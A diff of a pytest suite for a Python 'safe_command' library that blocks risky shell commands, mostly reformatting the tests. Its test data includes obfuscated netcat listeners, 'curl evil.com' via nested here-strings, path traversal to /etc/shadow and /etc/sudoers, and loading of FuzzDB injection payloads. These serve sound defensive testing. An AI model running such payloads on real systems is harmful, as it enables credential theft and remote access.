getenv from shutil import which +import pytest + from security import safe_command -from security.safe_command.api import _parse_command, _resolve_paths_in_parsed_command, _shell_expand from security.exceptions import SecurityException +from security.safe_command.api import ( + _parse_command, + _resolve_paths_in_parsed_command, + _shell_expand, +) with (Path(__file__).parent / "fuzzdb" / "command-injection-template.txt").open() as f: - FUZZDB_OS_COMMAND_INJECTION_PAYLOADS = [line.replace('\\n','\n').replace("\\'", "'")[:-1] for line in f][1:] # Remove newline from the end without modifying payloads and handle escapes -with (Path(__file__).parent / "fuzzdb" / "traversals-8-deep-exotic-encoding.txt").open() as f: - FUZZDB_PATH_TRAVERSAL_PAYLOADS = [line.replace('\\n','\n').replace("\\'", "'")[:-1] for line in f][1:] + FUZZDB_OS_COMMAND_INJECTION_PAYLOADS = [ + line.replace("\\n", "\n").replace("\\'", "'")[:-1] for line in f + ][ + 1: + ] # Remove newline from the end without modifying payloads and handle escapes +with ( + Path(__file__).parent / "fuzzdb" / "traversals-8-deep-exotic-encoding.txt" +).open() as f: + FUZZDB_PATH_TRAVERSAL_PAYLOADS = [ + line.replace("\\n", "\n").replace("\\'", "'")[:-1] for line in f + ][1:] @pytest.fixture @@ -39,11 +52,16 @@ def setup_teardown(tmpdir): fifo_testfile = (wd / "fifo_testfile").resolve() mkfifo(fifo_testfile) symlink_testfile = (wd / "symlink_testfile").resolve() - symlink(cwd_testfile, symlink_testfile) # Target of symlink_testfile is cwd_testfile.txt + symlink( + cwd_testfile, symlink_testfile + ) # Target of symlink_testfile is cwd_testfile.txt passwd = Path("/etc/passwd").resolve() sudoers = Path("/etc/sudoers").resolve() # Get Path objects for the test commands - cat, echo, grep, nc, curl, sh = map(lambda cmd: Path(which(cmd) or f"/usr/bin/{cmd}" ), ["cat", "echo", "grep", "nc", "curl", "sh"]) + cat, echo, grep, nc, curl, sh, bash = map( + lambda cmd: Path(which(cmd) or f"/usr/bin/{cmd}"), + ["cat", "echo", "grep", "nc.openbsd", "curl", "sh", "bash"], + ) testpaths = { "wd": wd, "test.txt": testtxt, @@ -61,11 +79,14 @@ def setup_teardown(tmpdir): "grep": grep, "nc": nc, "curl": curl, - "sh": sh + "sh": sh, + "bash": bash, } yield testpaths - remove(cwd_testfile) # Remove the current working directory test file since it is not in tmpdir - + remove( + cwd_testfile + ) # Remove the current working directory test file since it is not in tmpdir + def insert_testpaths(command, testpaths): """Replace placeholders in the command or expected result with the test paths""" @@ -85,21 +106,62 @@ class TestSafeCommandInternals: ("whoami", ["whoami"], ["whoami"]), ("ls -l", ["ls", "-l"], ["ls", "-l"]), ("ls -l -a", ["ls", "-l", "-a"], ["ls", "-l", "-a"]), - ("grep 'test' 'test.txt'", ["grep", "'test'", "'test.txt'"], ["grep", "test", "test.txt"]), - ("grep test test.txt", ["grep", "test", "test.txt"], ["grep", "test", "test.txt"]), - ("grep -e 'test test' 'test.txt'", ["grep", "-e", "'test test'", "'test.txt'"], ["grep", "-e", "test test", "test", "test", "test.txt"]), - ("echo 'test1 test2 test3' > test.txt", ["echo", "'test1 test2 test3'", ">", "test.txt"], ['echo', 'test1 test2 test3', 'test1', 'test2', 'test3', '>', 'test.txt']), - ('echo "test1 test2 test3" > test.txt', ["echo", '"test1 test2 test3"', ">", "test.txt"], ['echo', 'test1 test2 test3', 'test1', 'test2', 'test3', '>', 'test.txt']), - ("echo test1 test2 test3 > test.txt", ["echo", "test1", "test2", "test3", ">", "test.txt"], ["echo", "test1", "test2", "test3", ">", "test.txt"]), - ] + ( + "grep 'test' 'test.txt'", + ["grep", "'test'", "'test.txt'"], + ["grep", "test", "test.txt"], + ), + ( + "grep test test.txt", + ["grep", "test", "test.txt"], + ["grep", "test", "test.txt"], + ), + ( + "grep -e 'test test' 'test.txt'", + ["grep", "-e", "'test test'", "'test.txt'"], + ["grep", "-e", "test test", "test", "test", "test.txt"], + ), + ( + "echo 'test1 test2 test3' > test.txt", + ["echo", "'test1 test2 test3'", ">", "test.txt"], + [ + "echo", + "test1 test2 test3", + "test1", + "test2", + "test3", + ">", + "test.txt", + ], + ), + ( + 'echo "test1 test2 test3" > test.txt', + ["echo", '"test1 test2 test3"', ">", "test.txt"], + [ + "echo", + "test1 test2 test3", + "test1", + "test2", + "test3", + ">", + "test.txt", + ], + ), + ( + "echo test1 test2 test3 > test.txt", + ["echo", "test1", "test2", "test3", ">", "test.txt"], + ["echo", "test1", "test2", "test3", ">", "test.txt"], + ), + ], ) - def test_parse_command(self, str_cmd, list_cmd, expected_parsed_command, setup_teardown): + def test_parse_command( + self, str_cmd, list_cmd, expected_parsed_command, setup_teardown + ): expanded_str_cmd, parsed_str_cmd = _parse_command(str_cmd) expanded_list_cmd, parsed_list_cmd = _parse_command(list_cmd) assert expanded_str_cmd == expanded_list_cmd assert parsed_str_cmd == parsed_list_cmd == expected_parsed_command - @pytest.mark.parametrize( "command, expected_paths", [ @@ -115,35 +177,42 @@ def test_parse_command(self, str_cmd, list_cmd, expected_parsed_command, setup_t ("cat {wd}/*t.txt {wd}/test?.txt", {"cat", "test.txt", "test2.txt"}), ("cat {wd}///////*t.txt", {"cat", "test.txt"}), # Check globbing in executable path - ("/bin/c*t '{test.txt}' ", {"cat", "test.txt"}), + ("/bin/c*at '{test.txt}' ", {"cat", "test.txt"}), # Check that /etc or /private/etc for mac handling is correct ("cat /etc/passwd /etc/sudoers ", {"cat", "passwd", "sudoers"}), ("/bin/cat /etc/passwd", {"cat", "passwd"}), # Check fifo and symlink ("cat {fifo_testfile}", {"cat", "fifo_testfile"}), # Symlink should resolve to cwdtest.txt so should get the symlink and the target - ("cat {symlink_testfile}", {"cat", "symlink_testfile", "cwd_testfile"},), + ( + "cat {symlink_testfile}", + {"cat", "symlink_testfile", "cwd_testfile"}, + ), # Check a command with binary name as an argument ("echo 'cat' {test.txt}", {"echo", "cat", "test.txt"}), # Command has a directory so should get the dir and all the subfiles and resolved symlink to cwdtest.txt - ("grep 'cat' -r {rglob_testdir}", {"grep", "cat", "rglob_testdir", "rglob_testfile"}), + ( + "grep 'cat' -r {rglob_testdir}", + {"grep", "cat", "rglob_testdir", "rglob_testfile"}, + ), ("nc -l -p 1234", {"nc"}), ("curl https://example.com", {"curl"}), - ("sh -c 'curl https://example.com'", {"sh", "curl"}), + ("sh -c 'curl https://example.com'", {"bash", "curl"}), ("cat '{space_in_name}'", {"cat", "space_in_name"}), - ] + ], ) - def test_resolve_paths_in_parsed_command(self, command, expected_paths, setup_teardown): + def test_resolve_paths_in_parsed_command( + self, command, expected_paths, setup_teardown + ): testpaths = setup_teardown command = insert_testpaths(command, testpaths) expected_paths = {testpaths[p] for p in expected_paths} - expanded_command, parsed_command = _parse_command(command) + _, parsed_command = _parse_command(command) abs_paths, abs_path_strings = _resolve_paths_in_parsed_command(parsed_command) assert abs_paths == expected_paths assert abs_path_strings == {str(p) for p in expected_paths} - @pytest.mark.parametrize( "string, expanded_str", [ @@ -151,9 +220,8 @@ def test_resolve_paths_in_parsed_command(self, command, expected_paths, setup_te ("$HOME", f"{str(Path.home())}"), ("$PWD", f"{Path.cwd()}"), ("$IFS", " "), - ("$HOME $PWD $IFS", f"{str(Path.home())} {Path.cwd()} "), - ("${HOME} ${PWD} ${IFS}", f"{str(Path.home())} {Path.cwd()} "), - + ("$HOME $PWD $IFS", f"{str(Path.home())} {Path.cwd()} "), + ("${HOME} ${PWD} ${IFS}", f"{str(Path.home())} {Path.cwd()} "), # Slice expansions ("${IFS}", " "), ("${IFS:0}", " "), @@ -163,17 +231,15 @@ def test_resolve_paths_in_parsed_command(self, command, expected_paths, setup_te ("${HOME:1:-10}", f"{str(Path.home())[1:-10]}"), ("${HOME::2}", f"{str(Path.home())[0:2]}"), ("${HOME::}", f"{str(Path.home())[0:0]}"), - ("${HOME: -1: -10}", f"{str(Path.home())[-1:-10]}"), + ("${HOME: -1: -10}", f"{str(Path.home())[-1:-10]}"), ("${HOME:1+2+3-4:1.5+2.5+6-5.0}", f"{str(Path.home())[2:5]}"), ("${BADKEY:0:2}", ""), - # Default value expansions that look like slice expansions ("${BADKEY:-1}", "1"), ("${BADKEY:-1:10}", "1:10"), ("A${BADKEY:0:10}B", "AB"), ("A${BADKEY:-}B", "AB"), ("A${BADKEY:- }B", "A B"), - # Default value expansions ("${HOME:-defaultval}", f"{str(Path.home())}"), ("${HOME:=defaultval}", f"{str(Path.home())}"), @@ -183,91 +249,109 @@ def test_resolve_paths_in_parsed_command(self, command, expected_paths, setup_te ("${BADKEY:+defaultval}", ""), ("${BADKEY:-$USER}", f"{getenv('USER')}"), # Nested default value expansions - ("${BADKEY:-${USER}}" , f"{getenv('USER')}"), + ("${BADKEY:-${USER}}", f"{getenv('USER')}"), ("${BADKEY:-${BADKEY:-${USER}}}", f"{getenv('USER')}"), - # Values set during expansions should be used ("${BADKEY:=setval} $BADKEY ${BADKEY:=unused}", "setval setval setval"), ("${BADKEY:=cu} ${BADKEY2:=rl} ${BADKEY}${BADKEY2}", "cu rl curl"), - ("${BADKEY:=0} ${BADKEY2:=10} ${HOME:BADKEY:BADKEY2}", f"0 10 {str(Path.home())[0:10]}"), - ("${BADKEY:=5} ${BADKEY2:=10} ${HOME: BADKEY + BADKEY2 - 10: BADKEY2 - 3 }", f"5 10 {str(Path.home())[5:7]}"), - ("${BADKEY:=5} ${BADKEY2:=10} ${HOME: $BADKEY + ${BADKEY2} - 10: BADKEY2 - 3 }", f"5 10 {str(Path.home())[5:7]}"), + ( + "${BADKEY:=0} ${BADKEY2:=10} ${HOME:BADKEY:BADKEY2}", + f"0 10 {str(Path.home())[0:10]}", + ), + ( + "${BADKEY:=5} ${BADKEY2:=10} ${HOME: BADKEY + BADKEY2 - 10: BADKEY2 - 3 }", + f"5 10 {str(Path.home())[5:7]}", + ), + ( + "${BADKEY:=5} ${BADKEY2:=10} ${HOME: $BADKEY + ${BADKEY2} - 10: BADKEY2 - 3 }", + f"5 10 {str(Path.home())[5:7]}", + ), ("${HOME: BADKEY=5: BADKEY+BADKEY}", f"{str(Path.home())[5:10]}"), ("${HOME: BADKEY=5: BADKEY+=5 } $BADKEY", f"{str(Path.home())[5:10]} 10"), - ("${HOME: BADKEY=1+2+3 : BADKEY2=BADKEY+4 } $BADKEY $BADKEY2", f"{str(Path.home())[6:10]} 6 10"), - ("${HOME: BADKEY=5+6-1-5 : BADKEY2=BADKEY+5 } ${BADKEY} ${BADKEY2}", f"{str(Path.home())[5:10]} 5 10"), + ( + "${HOME: BADKEY=1+2+3 : BADKEY2=BADKEY+4 } $BADKEY $BADKEY2", + f"{str(Path.home())[6:10]} 6 10", + ), + ( + "${HOME: BADKEY=5+6-1-5 : BADKEY2=BADKEY+5 } ${BADKEY} ${BADKEY2}", + f"{str(Path.home())[5:10]} 5 10", + ), ("${BADKEY:=} ${BADKEY:-cu}${BADKEY}${BADKEY:-rl}", " curl"), - - # Brace expansions ("a{d,c,b}e", "ade ace abe"), ("a{'d',\"c\",b}e", "ade ace abe"), ("a{$HOME,$PWD,$IFS}e", f"a{str(Path.home())}e a{Path.cwd()}e a e"), - # Int Sequence expansions ("{1..-1}", "1 0 -1"), ("{1..1}", "1"), ("{1..4}", "1 2 3 4"), - ("{1..10..2}", "1 3 5 7 9"), ("{1..10..-2}", "9 7 5 3 1"), ("{10..1..2}", "10 8 6 4 2"), ("{10..1..-2}", "2 4 6 8 10"), - ("{-1..10..2}", "-1 1 3 5 7 9"), ("{-1..10..-2}", "9 7 5 3 1 -1"), ("{10..-1..2}", "10 8 6 4 2 0"), ("{10..-1..-2}", "0 2 4 6 8 10"), - ("{1..-10..2}", "1 -1 -3 -5 -7 -9"), ("{1..-10..-2}", "-9 -7 -5 -3 -1 1"), ("{-10..1..2}", "-10 -8 -6 -4 -2 0"), ("{-10..1..-2}", "0 -2 -4 -6 -8 -10"), - ("{-1..-10..2}", "-1 -3 -5 -7 -9"), ("{-1..-10..-2}", "-9 -7 -5 -3 -1"), ("{-10..-1..2}", "-10 -8 -6 -4 -2"), ("{-10..-1..-2}", "-2 -4 -6 -8 -10"), ("{10..-10..2}", "10 8 6 4 2 0 -2 -4 -6 -8 -10"), ("{10..-10..-2}", "-10 -8 -6 -4 -2 0 2 4 6 8 10"), - # Step of 0 should not expand but should remove the brackets ("{1..10..0}", "1..10..0"), ("AB{1..10..0}CD", "AB1..10..0CD"), - # Character Sequence expansions ("{a..z}", "a b c d e f g h i j k l m n o p q r s t u v w x y z"), ("{a..d}", "a b c d"), ("{a..Z}", "a ` _ ^ ] \\ [ Z"), - ("{A..z}", "A B C D E F G H I J K L M N O P Q R S T U V W X Y Z [ \\ ] ^ _ ` a b c d e f g h i j k l m n o p q r s t u v w x y z"), + ( + "{A..z}", + "A B C D E F G H I J K L M N O P Q R S T U V W X Y Z [ \\ ] ^ _ ` a b c d e f g h i j k l m n o p q r s t u v w x y z", + ), ("{A..D}", "A B C D"), ("{z..a}", "z y x w v u t s r q p o n m l k j i h g f e d c b a"), ("{Z..a}", "Z [ \\ ] ^ _ ` a"), - ("{0..Z}", "0 1 2 3 4 5 6 7 8 9 : ; < = > ? @ A B C D E F G H I J K L M N O P Q R S T U V W X Y Z"), - ("{0..z}", "0 1 2 3 4 5 6 7 8 9 : ; < = > ? @ A B C D E F G H I J K L M N O P Q R S T U V W X Y Z [ \\ ] ^ _ ` a b c d e f g h i j k l m n o p q r s t u v w x y z"), - ("{a..1}", "a ` _ ^ ] \\ [ Z Y X W V U T S R Q P O N M L K J I H G F E D C B A @ ? > = < ; : 9 8 7 6 5 4 3 2 1"), - + ( + "{0..Z}", + "0 1 2 3 4 5 6 7 8 9 : ; < = > ? @ A B C D E F G H I J K L M N O P Q R S T U V W X Y Z", + ), + ( + "{0..z}", + "0 1 2 3 4 5 6 7 8 9 : ; < = > ? @ A B C D E F G H I J K L M N O P Q R S T U V W X Y Z [ \\ ] ^ _ ` a b c d e f g h i j k l m n o p q r s t u v w x y z", + ), + ( + "{a..1}", + "a ` _ ^ ] \\ [ Z Y X W V U T S R Q P O N M L K J I H G F E D C B A @ ? > = < ; : 9 8 7 6 5 4 3 2 1", + ), # Character Sequence expansions with step should be returned as is ("{a..z..2}", "{a..z..2}"), - - # Expansions that increase number of words + # Expansions that increase number of words ("a{1..4}e", "a1e a2e a3e a4e"), - ("AB{1..10..2}CD {$HOME,$PWD} ${BADKEY:-defaultval}", f"AB1CD AB3CD AB5CD AB7CD AB9CD {str(Path.home())} {Path.cwd()} defaultval"), + ( + "AB{1..10..2}CD {$HOME,$PWD} ${BADKEY:-defaultval}", + f"AB1CD AB3CD AB5CD AB7CD AB9CD {str(Path.home())} {Path.cwd()} defaultval", + ), ("AB{1..4}CD", "AB1CD AB2CD AB3CD AB4CD"), - - #Invalid expansions should not be expanded + # Invalid expansions should not be expanded ("AB{1..$HOME}CD", f"AB{'{'}1..{str(Path.home())}{'}'}CD"), ("{1..--1}", "{1..--1}"), ("{Z..a..2}", "{Z..a..2}"), - # With a '-' in the expansion defaultval - ("find . -name '*.txt' ${BADKEY:--exec} cat {} + ", "find . -name '*.txt' -exec cat {} + "), - ] + ( + "find . -name '*.txt' ${BADKEY:--exec} cat {} + ", + "find . -name '*.txt' -exec cat {} + ", + ), + ], ) def test_shell_expansions(self, string, expanded_str): assert _shell_expand(string) == expanded_str - @pytest.mark.parametrize( "string", [ @@ -290,16 +374,14 @@ def test_shell_expansions(self, string, expanded_str): "${parameter,pattern}", "${parameter,,pattern}", "${parameter@operator}", - - # All these should be blocked because evaluation of nested expansions + # All these should be blocked because evaluation of nested expansions # returns a / which is a banned expansion operator "${BADKEY:-$HOME}", - "${BADKEY:-${HOME}}" , + "${BADKEY:-${HOME}}", "${BADKEY:-${BADKEY:-${HOME}}}", # Same as previous but with @ and ^ in the nested expansion "${BADKEY:-{a..1}}", "${BADKEY:-{a..Z}}", - # These should be blocked because they are invalid arithmetic expansions "${HOME:1-}", "${HOME:1+}", @@ -310,57 +392,79 @@ def test_shell_expansions(self, string, expanded_str): "${HOME:V=}", "${HOME: V= }", "${HOME:V=1=}", - - ] + ], ) def test_banned_shell_expansion(self, string): with pytest.raises(SecurityException) as cm: _shell_expand(string) - + error_msg = cm.value.args[0] - assert error_msg.startswith("Disallowed shell expansion") or error_msg.startswith("Invalid arithmetic in shell expansion") + assert error_msg.startswith( + "Disallowed shell expansion" + ) or error_msg.startswith("Invalid arithmetic in shell expansion") + EXCEPTIONS = { - "PREVENT_ARGUMENTS_TARGETING_SENSITIVE_FILES": SecurityException("Disallowed access to sensitive file"), + "PREVENT_ARGUMENTS_TARGETING_SENSITIVE_FILES": SecurityException( + "Disallowed access to sensitive file" + ), "PREVENT_COMMAND_CHAINING": SecurityException("Multiple commands not allowed"), "PREVENT_COMMON_EXPLOIT_EXECUTABLES": SecurityException("Disallowed command"), "PREVENT_UNCOMMON_PATH_TYPES": SecurityException("Disallowed access to path type"), - "PREVENT_ADMIN_OWNED_FILES": SecurityException("Disallowed access to file owned by"), - "ANY": SecurityException("Any Security exception") + "PREVENT_ADMIN_OWNED_FILES": SecurityException( + "Disallowed access to file owned by" + ), + "ANY": SecurityException("Any Security exception"), } + @pytest.mark.parametrize("original_func", [subprocess.run, subprocess.call]) class TestSafeCommandRestrictions: - def _run_test_with_command(self, command, expected_result, restrictions, original_func, shell=True, compare_stderr=False, *args, **kwargs): + def _run_test_with_command( + self, + command, + expected_result, + restrictions, + original_func, + shell=True, + compare_stderr=False, + *args, + **kwargs, + ): if isinstance(expected_result, SecurityException): with pytest.raises(SecurityException) as cm: safe_command.run( original_func=original_func, - command=command, *args, + command=command, + *args, restrictions=restrictions, - shell=shell, **kwargs + shell=shell, + **kwargs, ) raised_exception = cm.value # If the expected exception is not "Any Security exception" then check that the raised exception starts with the expected message if expected_result.args[0] != "Any Security exception": - assert raised_exception.args[0].startswith(expected_result.args[0]) - + assert raised_exception.args[0].startswith(expected_result.args[0]) + else: result = safe_command.run( - original_func=original_func, - command=command, *args, - restrictions=restrictions, - shell=shell, - capture_output=True, - text=True, - **kwargs, - + original_func=original_func, + command=command, + *args, + restrictions=restrictions, + shell=shell, + capture_output=True, + text=True, + **kwargs, ) if result: - compare_val = result.stdout.strip() if not compare_stderr else result.stderr.strip() + compare_val = ( + result.stdout.strip() + if not compare_stderr + else result.stderr.strip() + ) assert compare_val == expected_result - @pytest.mark.parametrize( "command", @@ -386,8 +490,6 @@ def _run_test_with_command(self, command, expected_result, restrictions, origina "sh -c 'whoami'", "find . -name '*.txt' -exec cat {} + ", "find . -name '*.txt' ${BADKEY:--exec} cat {} + ", - - ["ls", "-l;", "whoami"], ["ls", "-l", "&&", "whoami"], ["ls", "-l", "||", "whoami"], @@ -408,8 +510,8 @@ def _run_test_with_command(self, command, expected_result, restrictions, origina ["sh<><(whoami)"], ["sh", "-c", "'whoami'"], ["find", ".", "-name", "'*.txt'", "-exec", "cat", "{}", "+"], - ["find", ".", "-name", "'*.txt'", "${BADKEY:--exec}", "cat", "{}", "+"], - ] + ["find", ".", "-name", "'*.txt'", "${BADKEY:--exec}", "cat", "{}", "+"], + ], ) def test_check_multiple_commands(self, command, original_func, setup_teardown): exception = EXCEPTIONS["PREVENT_COMMAND_CHAINING"] @@ -430,7 +532,6 @@ def test_check_multiple_commands(self, command, original_func, setup_teardown): "cat ../../../../../../../../../../../../../../../../../../../../etc/sudoers.d/../sudoers", "cat /etc/sudoers.d/../sudoers", "cat ~/../../../../../../../../../../../../../../../../../../etc/p*sswd", - ["cat", "/etc/shadow"], ["cat", "/etc/passwd"], ["cat", "/etc/passwd"], @@ -441,15 +542,17 @@ def test_check_multiple_commands(self, command, original_func, setup_teardown): ["cat", "/etc/sudoers"], ["cat", "../../../../../../../../../../etc/sudoers.d/../sudoers"], ["cat", "/etc/sudoers.d/../sudoers"], - ["cat", "~/../../../../../../../../../../../../../../../../../../etc/p*sswd"], - ] - ) + [ + "cat", + "~/../../../../../../../../../../../../../../../../../../etc/p*sswd", + ], + ], + ) def test_check_sensitive_files(self, command, original_func, setup_teardown): exception = EXCEPTIONS["PREVENT_ARGUMENTS_TARGETING_SENSITIVE_FILES"] restrictions = {"PREVENT_ARGUMENTS_TARGETING_SENSITIVE_FILES"} self._run_test_with_command(command, exception, restrictions, original_func) - @pytest.mark.parametrize( "command", [ @@ -458,7 +561,7 @@ def test_check_sensitive_files(self, command, original_func, setup_teardown): "ls -l /usr/bin/curl", "curl https://example.com", "sh -c 'curl https://example.com'", - "sh -c \"curl https://example.com\"", + 'sh -c "curl https://example.com"', "sh -c ' curl https://example.com'", "sh -c 'sh -c \" curl https://example.com\" '", "sh -c \"sh -c 'curl https://example.com' \"", @@ -466,7 +569,7 @@ def test_check_sensitive_files(self, command, original_func, setup_teardown): "find . -name '*' -exec /usr/bin/curl {} + ", "find . -name '*' -exec /usr/bin/cu*l {} + ", " netcat -l -p 1234", - "nc -l -p 1234", + "nc -l -p 1234", "/usr/bin/nc -l -p 1234", "/usr/bin/nc* -l -p 1234", "/usr/*i**/nc -l -p 1234", @@ -483,14 +586,13 @@ def test_check_sensitive_files(self, command, original_func, setup_teardown): "sh <<< 'bash <<< \"curl evil.com\"'", "sh <<< 'bash<<< \"curl evil.com\"'", "sh<<<'bash<<<\"curl evil.com\"'", - ["ls", "-l", "/usr/bin/nc"], ["ls", "-l", "/usr/bin/netcat"], ["ls", "-l", "/usr/bin/curl"], ["curl", "https://example.com"], ["sh", "-c", "curl https://example.com"], ["sh", "-c", " curl https://example.com"], - ["sh", "-c", "sh -c \" curl https://example.com\" "], + ["sh", "-c", 'sh -c " curl https://example.com" '], ["sh", "-c", "sh -c 'curl https://example.com' "], ["find", ".", "-name", "'*'", "-exec", "curl", "{}", "+"], ["find", ".", "-name", "'*'", "-exec", "/usr/bin/curl", "{}", "+"], @@ -501,21 +603,27 @@ def test_check_sensitive_files(self, command, original_func, setup_teardown): ["/usr/bin/nc*", "-l", "-p", "1234"], ["/usr/*i**/nc", "-l", "-p", "1234"], ["{nc,-l,-p,1234}"], - - ["${IFS}nc${IFS}-l${IFS}-p${IFS}1234"], + ["${IFS}nc${IFS}-l${IFS}-p${IFS}1234"], ["${BADKEY:-$IFS}nc${BADKEY:-$IFS}-l${BADKEY:-$IFS}-p${BADKEY:-$IFS}1234"], ["${BADKEY:-nc}", "${BADKEY:--l}", "${BADKEY:--p}", "${BADKEY:-1234}"], ["${IFS}/usr/bin/nc*${IFS}", "-l", "-p", "1234"], ["$IFS nc${IFS}", "-p", "1234"], - ["find", ".", "-name", "'*'", "-exec", "\"${IFS}/usr/bin/cu*l${IFS}\"", "{}", "+"], - ["sh", "-c", "sh -c \"${IFS}/usr/bin/c*rl${IFS}https://example.com${IFS}\" "], + [ + "find", + ".", + "-name", + "'*'", + "-exec", + '"${IFS}/usr/bin/cu*l${IFS}"', + "{}", + "+", + ], + ["sh", "-c", 'sh -c "${IFS}/usr/bin/c*rl${IFS}https://example.com${IFS}" '], ["sh", "<<<", "'bash <<< \"curl evil.com\"'"], ["sh", "<<<", "'bash<<<\"curl evil.com\"'"], - ["sh<<<'bash<<<\"curl evil.com\"'"] - - - ] - ) + ["sh<<<'bash<<<\"curl evil.com\"'"], + ], + ) def test_check_banned_executable(self, command, original_func, setup_teardown): exception = EXCEPTIONS["PREVENT_COMMON_EXPLOIT_EXECUTABLES"] restrictions = {"PREVENT_COMMON_EXPLOIT_EXECUTABLES"} @@ -527,9 +635,9 @@ def test_check_banned_executable(self, command, original_func, setup_teardown): "cat {fifo_testfile}", "cat {symlink_testfile}", ["cat", "{fifo_testfile}"], - ["cat", "{symlink_testfile}"], - ] - ) + ["cat", "{symlink_testfile}"], + ], + ) def test_check_path_type(self, command, original_func, setup_teardown): exception = EXCEPTIONS["PREVENT_UNCOMMON_PATH_TYPES"] restrictions = {"PREVENT_UNCOMMON_PATH_TYPES"} @@ -538,7 +646,6 @@ def test_check_path_type(self, command, original_func, setup_teardown): command = insert_testpaths(command, testpaths) self._run_test_with_command(command, exception, restrictions, original_func) - @pytest.mark.parametrize( "command", [ @@ -548,14 +655,13 @@ def test_check_path_type(self, command, original_func, setup_teardown): ["cat", "/etc/passwd"], ["cat", "/var/log/*"], ["grep", "-r", "/var/log"], - ] - ) + ], + ) def test_check_file_owner(self, command, original_func, setup_teardown): exception = EXCEPTIONS["PREVENT_ADMIN_OWNED_FILES"] restrictions = {"PREVENT_ADMIN_OWNED_FILES"} self._run_test_with_command(command, exception, restrictions, original_func) - - + @pytest.mark.parametrize( "command, expected_result", [ @@ -567,124 +673,160 @@ def test_check_file_owner(self, command, original_func, setup_teardown): ("grep -e 'USERDATA[12]' {test.txt}", "USERDATA1\nUSERDATA2"), # Find should not be blocked unless using -exec or trying to find sensitive files ("find {rglob_testdir} -name '*.txt' -print -quit", "{rglob_testfile}"), - (["echo", "HELLO"], "HELLO"), (["cat", "{test.txt}"], "USERDATA1\nUSERDATA2\nUSERDATA3"), (["/bin/cat", "{test2.txt}"], "USERDATA4\nUSERDATA5\nUSERDATA6"), (["grep", "-e", "USERDATA[12]", "{test.txt}"], "USERDATA1\nUSERDATA2"), - (["find", "{rglob_testdir}", "-name", '*.txt', "-print", "-quit"], "{rglob_testfile}"), - ] + ( + ["find", "{rglob_testdir}", "-name", "*.txt", "-print", "-quit"], + "{rglob_testfile}", + ), + ], ) - def test_valid_commands_not_blocked(self, command, expected_result, original_func, setup_teardown): + def test_valid_commands_not_blocked( + self, command, expected_result, original_func, setup_teardown + ): if original_func.__name__ == "call": # call doesn't have capture_output kwarg so can't compare result and easier to just return than refactor - return - + return + testpaths = setup_teardown command = insert_testpaths(command, testpaths) expected_result = insert_testpaths(expected_result, testpaths) - + # Use all restrictions to make sure none of them block the command restrictions = [ - "PREVENT_COMMAND_CHAINING", + "PREVENT_COMMAND_CHAINING", "PREVENT_ARGUMENTS_TARGETING_SENSITIVE_FILES", - "PREVENT_COMMON_EXPLOIT_EXECUTABLES", + "PREVENT_COMMON_EXPLOIT_EXECUTABLES", "PREVENT_UNCOMMON_PATH_TYPES", - "PREVENT_ADMIN_OWNED_FILES" ] shell = isinstance(command, str) - self._run_test_with_command(command, expected_result, restrictions, original_func, shell=shell) - + self._run_test_with_command( + command, expected_result, restrictions, original_func, shell=shell + ) @pytest.mark.parametrize( "command, expected_result, popen_kwargs", [ - ("echo $HOME/somefile/", f"{str(Path.home())}/somefile/", {"shell": True}), - ("echo $HOME", "/Users/TESTHOME", {"env": {"HOME": "/Users/TESTHOME"}, "shell": True}), - ("echo $HOME", EXCEPTIONS["PREVENT_ARGUMENTS_TARGETING_SENSITIVE_FILES"], {"env": {"HOME": "/etc/passwd"}, "shell": True}), - (["/bin/echo $HOME/somefile/"], f"{str(Path.home())}/somefile/", {"shell": True}), - (["/bin/echo", "$HOME/somefile/"], f"$HOME/somefile/", {"shell": False}), - - # Should only raise exception if shell is True or executable is a shell - (["/bin/cat /etc/${BADKEY:-passwd}"], EXCEPTIONS["PREVENT_ARGUMENTS_TARGETING_SENSITIVE_FILES"], {"shell": True}), - (["/bin/cat /etc/${BADKEY:-passwd}"], EXCEPTIONS["PREVENT_ARGUMENTS_TARGETING_SENSITIVE_FILES"], {"shell": False, "executable": "/bin/bash"}), - (["/bin/cat", "/etc/${BADKEY:-passwd}"], "", {"shell": False}), - # Executable takes precedence over shell so this should not raise an exception even though the shell expansion would resolve to /etc/passwd - (["/etc/${BADKEY:-passwd}"], "", {"shell": True, "executable": "/bin/cat"}), - - # env kwarg values used in shell expansions - ("echo $HOME/{file1.txt,file2.txt,${BADKEY:=file3.txt},${BADKEY:+file4.txt}}", - "/Users/TESTHOME/file1.txt /Users/TESTHOME/file2.txt /Users/TESTHOME/file3.txt /Users/TESTHOME/file4.txt", - {"shell": True, "env": {"HOME": "/Users/TESTHOME"}}), - (["-c", "cat /{junk1,\"${TEST:1:2}${TEST:0:1}\"}c/p*sswd"], - EXCEPTIONS["PREVENT_ARGUMENTS_TARGETING_SENSITIVE_FILES"], - {"shell": False, "executable": "bash", "env": {"TEST": "test"}}), - - # path resolution should be based on env variables - ("which ls", which("ls"), {"shell": True}), - ("which ls", "", {"shell": True, "env": {"PATH": ""}}), - ("(sh)<<<'{nc,-l,-p,4444}'", EXCEPTIONS["PREVENT_COMMON_EXPLOIT_EXECUTABLES"], {"shell": True}), - # No exception should be raised here becuase when env PATH is set to empty string, the executables can't be found - ("(sh)<<<'{nc,-l,-p,4444}'", "", {"shell": True, "env" : {"PATH": ""}}), - ] - + ("echo $HOME/somefile/", f"{str(Path.home())}/somefile/", {"shell": True}), + ( + "echo $HOME", + "/Users/TESTHOME", + {"env": {"HOME": "/Users/TESTHOME"}, "shell": True}, + ), + ( + "echo $HOME", + EXCEPTIONS["PREVENT_ARGUMENTS_TARGETING_SENSITIVE_FILES"], + {"env": {"HOME": "/etc/passwd"}, "shell": True}, + ), + ( + ["/bin/echo $HOME/somefile/"], + f"{str(Path.home())}/somefile/", + {"shell": True}, + ), + (["/bin/echo", "$HOME/somefile/"], "$HOME/somefile/", {"shell": False}), + # Should only raise exception if shell is True or executable is a shell + ( + ["/bin/cat /etc/${BADKEY:-passwd}"], + EXCEPTIONS["PREVENT_ARGUMENTS_TARGETING_SENSITIVE_FILES"], + {"shell": True}, + ), + ( + ["/bin/cat /etc/${BADKEY:-passwd}"], + EXCEPTIONS["PREVENT_ARGUMENTS_TARGETING_SENSITIVE_FILES"], + {"shell": False, "executable": "/bin/bash"}, + ), + (["/bin/cat", "/etc/${BADKEY:-passwd}"], "", {"shell": False}), + # Executable takes precedence over shell so this should not raise an exception even though the shell expansion would resolve to /etc/passwd + (["/etc/${BADKEY:-passwd}"], "", {"shell": True, "executable": "/bin/cat"}), + # env kwarg values used in shell expansions + ( + "echo 